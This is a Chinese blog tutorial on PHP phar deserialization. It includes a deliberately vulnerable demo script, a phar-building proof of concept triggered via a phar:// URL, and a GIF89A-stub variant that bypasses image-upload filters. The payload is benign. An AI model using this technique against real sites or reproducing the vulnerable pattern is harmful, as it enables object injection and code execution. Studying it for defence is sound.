phar反序列化

https://blog.csdn.net/xiaolong22333/article/details/116092578

phar简单的利用,新建一个demo.php的文件

<?php
class TestObject{
    public $name;
    function __destruct()
{
echo $this->name;
}
}
if($_GET['file']){
    file_exists($_GET['file']);
}

新建phar.php

<?php
class TestObject{

}
$p = new TestObject();
$p->name='hello';
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

访问phar.php生成新的test.phar文件
在这里插入图片描述
访问http://www.d.com/demo.php?file=phar://test.phar
就会触发phar反序列化
这是因为file_exists函数会触发phar反序列化

利用phar反序列化绕过文件上传案例
在这里插入图片描述
https://www.4hou.com/posts/5L38
运行这段代码,再把生成的test.phar后缀改为

<?php
class TestObject{

}
$p = new TestObject();
$p->name='hello';
$phar = new Phar("test.phar");//后缀名必须为phar
$phar->startBuffering();
$phar->setStub("GIF89A"."<?php __HALT_COMPILER();?>");//设置stub
$phar->setMetadata($p);//将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test");//添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

gif就可以绕过限制上传

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值